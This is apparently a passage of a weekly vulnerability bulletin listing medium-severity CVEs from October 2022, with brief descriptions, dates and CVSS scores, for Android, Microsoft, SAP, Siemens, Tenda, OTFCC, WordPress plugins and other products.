google — android In Messaging, there is an unauthorized broadcast; this could cause local denial of service. Product: Android. Versions: Android SoC. Android ID: A-242259918 2022-10-11 5.5 CVE-2022-20440
MISC
google — android In various functions of ap_input_processor.c, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-236042696. References: N/A 2022-10-14 5.5 CVE-2022-20464
MISC
google — android Use after free vulnerability in set_nft_pid and signal_handler function of NFC driver prior to SMR Oct-2022 Release 1 allows attackers to perform malicious actions. 2022-10-07 5.3 CVE-2022-39847
MISC
google — android In getInputMethodWindowVisibleHeight of InputMethodManagerService.java, there is a possible way to determine when another app is showing an IME due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10 Android-11 Android-12 Android-12L. Android ID: A-204906124 2022-10-11 5 CVE-2022-20394
MISC
google — android In rndis_set_response of rndis.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if a malicious USB device is attached with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-239842288. References: Upstream kernel 2022-10-11 4.6 CVE-2022-20423
MISC
google — android Improper access control vulnerability in FACM application prior to SMR Oct-2022 Release 1 allows a local attacker to connect arbitrary AP and Bluetooth devices. 2022-10-07 4.3 CVE-2022-39855
MISC
hashicorp — nomad HashiCorp Nomad and Nomad Enterprise 1.0.2 up to 1.2.12, and 1.3.5 jobs submitted with an artifact stanza using invalid S3 or GCS URLs can be used to crash client agents. Fixed in 1.2.13, 1.3.6, and 1.4.0. 2022-10-12 6.5 CVE-2022-41606
MISC
MISC
hashicorp — vault HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role’s CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10. 2022-10-12 5.3 CVE-2022-41316
MISC
MISC
haskell — aeson The aeson library is not safe to use to consume untrusted JSON input. A remote user could abuse this flaw to produce a hash collision in the underlying unordered-containers library by sending specially crafted JSON data, resulting in a denial of service. 2022-10-10 6.5 CVE-2022-3433
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability was found in SourceCodester Human Resource Management System. It has been classified as critical. Affected is an unknown function of the file getstatecity.php. The manipulation of the argument sc leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210714 is the identifier assigned to this vulnerability. 2022-10-13 6.5 CVE-2022-3470
MISC
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability classified as critical has been found in SourceCodester Human Resource Management System. This affects an unknown part of the file getstatecity.php. The manipulation of the argument ci leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-210717 was assigned to this vulnerability. 2022-10-13 6.5 CVE-2022-3473
MISC
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability, which was classified as problematic, has been found in SourceCodester Human Resource Management System 1.0. This issue affects some unknown processing of the component Add Employee Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-210773 was assigned to this vulnerability. 2022-10-13 5.4 CVE-2022-3493
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been classified as problematic. Affected is an unknown function of the component Master List. The manipulation of the argument city/state/country/position leads to cross site scripting. It is possible to launch the attack remotely. VDB-210786 is the identifier assigned to this vulnerability. 2022-10-14 5.4 CVE-2022-3497
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability was found in Human Resource Management System 1.0. It has been classified as problematic. This affects an unknown part of the component Leave Handler. The manipulation of the argument Reason leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210831. 2022-10-14 5.4 CVE-2022-3502
MISC
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability was found in SourceCodester Human Resource Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file city.php. The manipulation of the argument searccity leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210715. 2022-10-13 4.9 CVE-2022-3471
MISC
MISC
human_resource_management_system_project — human_resource_management_system A vulnerability was found in SourceCodester Human Resource Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file city.php. The manipulation of the argument cityedit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210716. 2022-10-13 4.9 CVE-2022-3472
MISC
MISC
ibm — navigator_mobile IBM Navigator Mobile Android 3.4.1.1 and 3.4.1.2 app could allow a local user to obtain sensitive information due to improper access control. IBM X-Force ID: 233968. 2022-10-11 5.5 CVE-2022-38388
CONFIRM
XF
ibm — sterling_partner_engagement_manager IBM Sterling Partner Engagement Manager 2.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 229704. 2022-10-10 6.5 CVE-2022-34334
CONFIRM
XF
ikus-soft — rdiffweb Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.0a4. 2022-10-10 6.1 CVE-2022-3438
CONFIRM
MISC
isc — dhcp In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory. 2022-10-07 6.5 CVE-2022-2929
CONFIRM
MLIST
FEDORA
jgraph — mxgraph mxGraph v4.2.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the setTooltips() function. 2022-10-12 6.1 CVE-2022-40440
MISC
MISC
MISC
johnsoncontrols — c-cure_9000_firmware Under certain circumstances a CCURE Portal user could enumerate user accounts in CCURE 9000 version 2.90 and prior versions. 2022-10-11 5.3 CVE-2021-36201
CERT
CONFIRM
johnsoncontrols — metasys_extended_application_and_data_server On Metasys ADX Server version 12.0 running MVE, an Active Directory user could execute validated actions without providing a valid password when using MVE SMP UI. 2022-10-07 6.5 CVE-2022-21936
CERT
CONFIRM
libreoffice — libreoffice LibreOffice supports Office URI Schemes to enable browser integration of LibreOffice with MS SharePoint server. An additional scheme ‘vnd.libreoffice.command’ specific to LibreOffice was added. In the affected versions of LibreOffice links using that scheme could be constructed to call internal macros with arbitrary arguments, which, when clicked on or activated by document events, could result in arbitrary script execution without warning. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.1; 7.3 versions prior to 7.3.6. 2022-10-11 6.3 CVE-2022-3140
MISC
DEBIAN
liferay — liferay_portal An insecure default in the component auth.login.prompt.enabled of Liferay Portal v7.0.0 through v7.4.2 allows attackers to enumerate usernames, site names, and pages. 2022-10-07 5.3 CVE-2022-41414
MISC
linux — linux_kernel mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse. 2022-10-09 5.5 CVE-2022-42703
MISC
MISC
MISC
MISC
linux — linux_kernel A vulnerability classified as problematic has been found in Linux Kernel. This affects the function fib_nh_match of the file net/ipv4/fib_semantics.c of the component IPv4 Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-210357 was assigned to this vulnerability. 2022-10-08 4.3 CVE-2022-3435
N/A
N/A
FEDORA
FEDORA
merchandise_online_store_project — merchandise_online_store A Stored XSS issue in Merchandise Online Store v.1.0 allows the injection of arbitrary JavaScript in the edit account form. 2022-10-11 5.4 CVE-2022-42236
MISC
metaslider — slider,_gallery,_and_carousel The Slider, Gallery, and Carousel by MetaSlider WordPress plugin before 3.27.9 does not sanitise and escape some of its Gallery Image parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-10 4.8 CVE-2022-2823
MISC
metroui — metro_ui Metro UI v4.4.0 to v4.5.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Javascript function. 2022-10-11 6.1 CVE-2022-41376
MISC
microsoft — azure_service_fabric Service Fabric Explorer Spoofing Vulnerability. 2022-10-11 4.8 CVE-2022-35829
MISC
microsoft — edge_chromium Microsoft Edge (Chromium-based) Spoofing Vulnerability. 2022-10-11 5.3 CVE-2022-41035
MISC
microsoft — office Microsoft Office Spoofing Vulnerability. 2022-10-11 6.5 CVE-2022-38001
MISC
microsoft — office Microsoft Office Information Disclosure Vulnerability. 2022-10-11 5.3 CVE-2022-41043
MISC
microsoft — storsimple_8010_firmware StorSimple 8000 Series Elevation of Privilege Vulnerability. 2022-10-11 6.8 CVE-2022-38017
MISC
microsoft — windows_10 Windows NTLM Spoofing Vulnerability. 2022-10-11 6.5 CVE-2022-35770
MISC
microsoft — windows_10 Windows Mixed Reality Developer Tools Information Disclosure Vulnerability. 2022-10-11 6.5 CVE-2022-37974
MISC
microsoft — windows_10 Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability. 2022-10-11 6.5 CVE-2022-37977
MISC
microsoft — windows_10 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability. 2022-10-11 5.9 CVE-2022-37965
MISC
microsoft — windows_10 Windows Graphics Component Information Disclosure Vulnerability. 2022-10-11 5.5 CVE-2022-37985
MISC
microsoft — windows_10 Windows Event Logging Service Denial of Service Vulnerability. 2022-10-11 4.3 CVE-2022-37981
MISC
microsoft — windows_server_2008 Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability. 2022-10-11 6.8 CVE-2022-38032
MISC
microsoft — windows_server_2008 Windows Server Remotely Accessible Registry Keys Information Disclosure Vulnerability. 2022-10-11 6.5 CVE-2022-38033
MISC
microsoft — windows_server_2008 Windows DHCP Client Information Disclosure Vulnerability. 2022-10-11 5.5 CVE-2022-38026
MISC
microsoft — windows_server_2008 Windows Security Support Provider Interface Information Disclosure Vulnerability. 2022-10-11 5.3 CVE-2022-38043
MISC
microsoft — windows_server_2012 Windows Kernel Memory Information Disclosure Vulnerability. 2022-10-11 5.5 CVE-2022-37996
MISC
microsoft — windows_server_2019 Windows USB Serial Driver Information Disclosure Vulnerability. 2022-10-11 4.3 CVE-2022-38030
MISC
microsoft — windows_server_2022 Windows Distributed File System (DFS) Information Disclosure Vulnerability. 2022-10-11 5.5 CVE-2022-38025
MISC
misp-project — malware_information_sharing_platform app/Controller/UsersController.php in MISP before 2.4.164 allows attackers to discover role names (this is information that only the site admin should have). 2022-10-10 4.3 CVE-2022-42724
MISC
octopus — octopus_server In affected versions of Octopus Server it is possible to reveal information about teams via the API due to an Insecure Direct Object Reference (IDOR) vulnerability 2022-10-13 6.5 CVE-2022-2828
MISC
octopus — octopus_server In affected versions of Octopus Server it was identified that when a sensitive value is a substring of another value, sensitive value masking will only partially work. 2022-10-12 5.3 CVE-2022-2720
MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system Online Birth Certificate Management System version 1.0 suffers from a persistent Cross Site Scripting (XSS) vulnerability. 2022-10-14 5.4 CVE-2022-42069
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b5567. 2022-10-14 6.5 CVE-2022-35040
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b558f. 2022-10-14 6.5 CVE-2022-35041
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x4adb11. 2022-10-14 6.5 CVE-2022-35042
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c08a6. 2022-10-14 6.5 CVE-2022-35043
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x617087. 2022-10-14 6.5 CVE-2022-35044
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0d63. 2022-10-14 6.5 CVE-2022-35045
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0466. 2022-10-14 6.5 CVE-2022-35046
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b05aa. 2022-10-14 6.5 CVE-2022-35047
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0b2c. 2022-10-14 6.5 CVE-2022-35048
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b03b5. 2022-10-14 6.5 CVE-2022-35049
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b04de. 2022-10-14 6.5 CVE-2022-35050
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b55af. 2022-10-14 6.5 CVE-2022-35051
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b84b1. 2022-10-14 6.5 CVE-2022-35052
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x61731f. 2022-10-14 6.5 CVE-2022-35053
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6171b2. 2022-10-14 6.5 CVE-2022-35054
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c0473. 2022-10-14 6.5 CVE-2022-35055
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b0478. 2022-10-14 6.5 CVE-2022-35056
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b05ce. 2022-10-14 6.5 CVE-2022-35058
MISC
MISC
otfcc_project — otfcc OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c0414. 2022-10-14 6.5 CVE-2022-35059
MISC
MISC
pencidesign — soledad The soledad WordPress theme before 8.2.5 does not sanitise the {id,datafilter[type],…} parameters in its penci_more_slist_post_ajax AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. 2022-10-10 6.1 CVE-2022-3209
MISC
picuploader_project — picuploader PicUploader v2.6.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the setStorageParams function in SettingController.php. 2022-10-07 6.1 CVE-2022-41442
MISC
MISC
premium-themes — cryptocurrency_pricing_list_and_ticker The Cryptocurrency Pricing list and Ticker WordPress plugin through 1.5 does not sanitise and escape the ccpw_setpage parameter before outputting it back in pages where its shortcode is embedded, leading to a Reflected Cross-Site Scripting issue 2022-10-10 6.1 CVE-2021-25044
MISC
projectworlds — online_examination_system Online Examination System version 1.0 suffers from a cross site scripting vulnerability via index.php. 2022-10-14 6.1 CVE-2022-42066
MISC
MISC
puppycms — puppycms A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699. 2022-10-12 6.1 CVE-2022-3464
N/A
purchase_order_management_system_project — purchase_order_management_system A vulnerability was found in SourceCodester Purchase Order Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Supplier Handler. The manipulation of the argument Supplier Name/Address/Contact person/Contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210832. 2022-10-14 5.4 CVE-2022-3503
MISC
MISC
resiot — iot_platform_and_lorawan_network_server Multiple Cross Site Scripting (XSS) vulnerabilities in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via the form fields. 2022-10-13 5.4 CVE-2022-34021
MISC
resmush.it — resmush.it_image_optimizer The reSmush.it WordPress plugin before 0.4.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when unfiltered_html is disallowed. 2022-10-10 4.8 CVE-2022-2448
MISC
rpcms — rpcms RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily change the password of any account. 2022-10-13 6.5 CVE-2022-41474
MISC
rpcms — rpcms RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function. 2022-10-13 6.1 CVE-2022-41473
MISC
samsung — account Sensitive log information leakage vulnerability in Samsung Account prior to version 13.5.0 allows attackers to perform an unauthorized logout. 2022-10-07 5.5 CVE-2022-39874
MISC
samsung — account Intent redirection vulnerability in Samsung Account prior to version 13.5.01.3 allows attackers to access content providers without permission. 2022-10-07 4.7 CVE-2022-39863
MISC
samsung — account Improper component protection vulnerability in Samsung Account prior to version 13.5.0 allows attackers to perform an unauthorized logout. 2022-10-07 4.4 CVE-2022-39875
MISC
samsung — checkout Improper access control vulnerability in Samsung Checkout prior to version 5.0.55.3 allows attackers to access sensitive information via implicit intent broadcast. 2022-10-07 5.5 CVE-2022-39878
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated SolidWorks Drawing (.sldasm, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-39807
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41166
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated CATIA5 Part (.catpart, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41169
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated CATIA4 Part (.model, CatiaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41171
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41173
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Right Hemisphere Material (.rhm, rh.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41174
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Enhanced Metafile (.emf, emf.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41176
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Iges Part and Assembly (.igs, .iges, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41178
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Portable Document Format (.pdf, PDFPublishing.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41181
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Parasolid Part and Assembly (.x_b, CoreCadTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41182
MISC
MISC
sap — 3d_visual_enterprise_author Due to lack of proper memory management, when a victim opens manipulated Windows Cursor File (.cur, ico.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author – version 9, it is possible for the application to crash and become temporarily unavailable to the user until restart of the application. 2022-10-11 5.5 CVE-2022-41183
MISC
MISC
sap — business_objects_business_intelligence_platform Under certain conditions, BOE AdminTools/ BOE SDK allows an attacker to access information which would otherwise be restricted. 2022-10-11 6.5 CVE-2022-39015
MISC
MISC
sap — businessobjects_business_intelligence SAP BusinessObjects BI LaunchPad – versions 420, 430, is susceptible to script execution attack by an unauthenticated attacker due to improper sanitization of the user inputs while interacting on the network. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application. 2022-10-11 6.1 CVE-2022-39800
MISC
MISC
sap — businessobjects_business_intelligence SAP BusinessObjects Business Intelligence platform (Analysis for OLAP) – versions 420, 430, allows an authenticated attacker to send user-controlled inputs when OLAP connections are created and edited in the Central Management Console. On successful exploitation, there could be a limited impact on confidentiality and integrity of the application. 2022-10-11 5.4 CVE-2022-41206
MISC
MISC
sap — businessobjects_business_intelligence Under certain conditions, the application SAP BusinessObjects Business Intelligence Platform (Version Management System) exposes sensitive information to an actor over the network with high privileges that is not explicitly authorized to have access to that information, leading to a high impact on Confidentiality. 2022-10-11 4.9 CVE-2022-35296
MISC
MISC
sap — customer_data_cloud SAP Customer Data Cloud (Gigya mobile app for Android) – version 7.4, uses encryption method which lacks proper diffusion and does not hide the patterns well. This can lead to information disclosure. In certain scenarios, application might also be susceptible to replay attacks. 2022-10-11 5.2 CVE-2022-41209
MISC
MISC
sap — customer_data_cloud SAP Customer Data Cloud (Gigya mobile app for Android) – version 7.4, uses insecure random number generator program which makes it easy for the attacker to predict future random numbers. This can lead to information disclosure and modification of certain user settings. 2022-10-11 5.2 CVE-2022-41210
MISC
MISC
sap — data_services SAP Data Services Management allows an attacker to copy the data from a request and have it echoed into the application’s immediate response, which will lead to a Cross-Site Scripting vulnerability. The attacker would have to log in to the management console to perform such an attack; only a few of the pages are vulnerable in the DS management console. 2022-10-11 6.1 CVE-2022-35226
MISC
MISC
sap — enable_now The application SAP Enable Now does not sufficiently encode user-controlled inputs over the network before it is placed in the output being served to other users, thereby expanding the attack scope, resulting in Stored Cross-Site Scripting (XSS) vulnerability leading to limited impact on Confidentiality, Integrity and Availability. 2022-10-11 5.4 CVE-2022-35297
MISC
MISC
shortpixel — enable_media_replace The Enable Media Replace WordPress plugin before 4.0.0 does not ensure that renamed files are moved to the Upload folder, which could allow high privilege users such as admin to move them outside to the web root directory via a path traversal attack for example 2022-10-10 4.9 CVE-2022-2554
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). Endpoints of the “Operation” web application that interpret and execute Axon language queries allow file read access to the device file system with root privileges. By supplying specific I/O related Axon queries, a remote low-privileged attacker can read sensitive files on the device. 2022-10-11 5.7 CVE-2022-40177
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). Improper Neutralization of Input During Web Page Generation exists in the “Import Files” functionality of the “Operation” web application, due to the missing validation of the titles of files included in the input package. By uploading a specifically crafted graphics package, a remote low-privileged attacker can execute arbitrary JavaScript code. 2022-10-11 5.4 CVE-2022-40178
MISC
siemens — desigo_pxm30-1_firmware A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), Desigo PXM40-1 (All versions < V02.20.126.11-41), Desigo PXM40.E (All versions < V02.20.126.11-41), Desigo PXM50-1 (All versions < V02.20.126.11-41), Desigo PXM50.E (All versions < V02.20.126.11-41), PXG3.W100-1 (All versions < V02.20.126.11-37), PXG3.W100-2 (All versions < V02.20.126.11-41), PXG3.W200-1 (All versions < V02.20.126.11-37), PXG3.W200-2 (All versions < V02.20.126.11-41). A Cross-Site Request Forgery exists in the “Import Files” functionality of the “Operation” web application due to the missing validation of anti-CSRF tokens or other origin checks. A remote unauthenticated attacker can upload and enable permanent arbitrary JavaScript code into the device just by convincing a victim to visit a specifically crafted webpage while logged-in to the device web application. 2022-10-11 5.3 CVE-2022-40180
MISC
siemens — logo!_8_bm_firmware A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). Affected devices do not properly validate an offset value which can be defined in TCP packets when calling a method. This could allow an attacker to retrieve parts of the content of the memory. 2022-10-11 5.3 CVE-2022-36363
MISC
siemens — scalance_x200-4p_irt_firmware A vulnerability has been identified in SCALANCE X200-4P IRT (All versions < V5.5.0), SCALANCE X201-3P IRT (All versions < V5.5.0), SCALANCE X201-3P IRT PRO (All versions < V5.5.0), SCALANCE X202-2IRT (All versions < V5.5.0), SCALANCE X202-2P IRT (All versions < V5.5.0), SCALANCE X202-2P IRT PRO (All versions < V5.5.0), SCALANCE X204-2 (All versions < V5.2.5), SCALANCE X204-2FM (All versions < V5.2.5), SCALANCE X204-2LD (All versions < V5.2.5), SCALANCE X204-2LD TS (All versions < V5.2.5), SCALANCE X204-2TS (All versions < V5.2.5), SCALANCE X204IRT (All versions < V5.5.0), SCALANCE X204IRT PRO (All versions < V5.5.0), SCALANCE X206-1 (All versions < V5.2.5), SCALANCE X206-1LD (All versions < V5.2.5), SCALANCE X208 (All versions < V5.2.5), SCALANCE X208PRO (All versions < V5.2.5), SCALANCE X212-2 (All versions < V5.2.5), SCALANCE X212-2LD (All versions < V5.2.5), SCALANCE X216 (All versions < V5.2.5), SCALANCE X224 (All versions < V5.2.5), SCALANCE XF201-3P IRT (All versions < V5.5.0), SCALANCE XF202-2P IRT (All versions < V5.5.0), SCALANCE XF204 (All versions < V5.2.5), SCALANCE XF204-2 (All versions < V5.2.5), SCALANCE XF204-2BA IRT (All versions < V5.5.0), SCALANCE XF204IRT (All versions < V5.5.0), SCALANCE XF206-1 (All versions < V5.2.5), SCALANCE XF208 (All versions < V5.2.5), SIPLUS NET SCALANCE X202-2P IRT (All versions < V5.5.0). There is a cross-site scripting vulnerability on the affected devices, that if used by a threat actor, it could result in session hijacking. 2022-10-11 6.1 CVE-2022-40631
MISC
simplefilelist — simple-file-list The Simple File List WordPress plugin before 4.4.12 does not implement nonce checks, which could allow attackers to make a logged in admin create a new page and change its content via a CSRF attack. 2022-10-10 6.5 CVE-2022-3208
MISC
simplefilelist — simple-file-list The Simple File List WordPress plugin before 4.4.12 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-10 4.8 CVE-2022-3207
MISC
solarwinds — network_configuration_manager An entity in Network Configuration Manager product is misconfigured and exposing password field to Solarwinds Information Service (SWIS). Exposed credentials are encrypted and require authenticated access with an NCM role. 2022-10-10 6.5 CVE-2021-35226
MISC
student_clearance_system_project — student_clearance_system A Stored XSS issue in Student Clearance System v.1.0 allows the injection of arbitrary JavaScript in the Student registration form. 2022-10-11 5.4 CVE-2022-42235
MISC
swftools — swftools SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via png_load at /lib/png.c. 2022-10-13 5.5 CVE-2022-35080
MISC
MISC
swftools — swftools SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via png_read_header at /src/png2swf.c. 2022-10-13 5.5 CVE-2022-35081
MISC
MISC
taskbuilder — taskbuilder The Taskbuilder WordPress plugin before 1.0.8 does not validate and sanitise task’s attachments, which could allow any authenticated user (such as subscriber) creating a task to perform Stored Cross-Site Scripting by attaching a malicious SVG file 2022-10-10 5.4 CVE-2022-3137
MISC
tenda — ac1206_firmware Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot. 2022-10-12 6.5 CVE-2022-42077
MISC
tenda — ac1206_firmware Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet. 2022-10-12 6.5 CVE-2022-42078
MISC
tenda — ax1803_firmware Tenda AX1803 US_AX1803v2.0br_v1.0.0.1_2994_CN_ZGYD01_4 is vulnerable to Cross Site Request Forgery (CSRF) via function TendaAteMode. 2022-10-12 6.5 CVE-2022-42086
MISC
